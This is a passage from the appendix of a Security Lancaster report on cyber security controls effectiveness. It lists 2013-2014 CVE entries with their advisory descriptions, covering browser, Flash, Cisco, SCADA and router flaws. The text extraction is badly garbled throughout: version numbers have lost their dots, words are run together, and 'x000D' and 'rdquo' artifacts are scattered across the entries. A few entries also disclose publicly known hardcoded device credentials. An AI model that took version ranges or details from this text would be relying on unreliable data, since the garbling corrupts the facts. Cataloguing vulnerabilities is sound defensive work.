CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
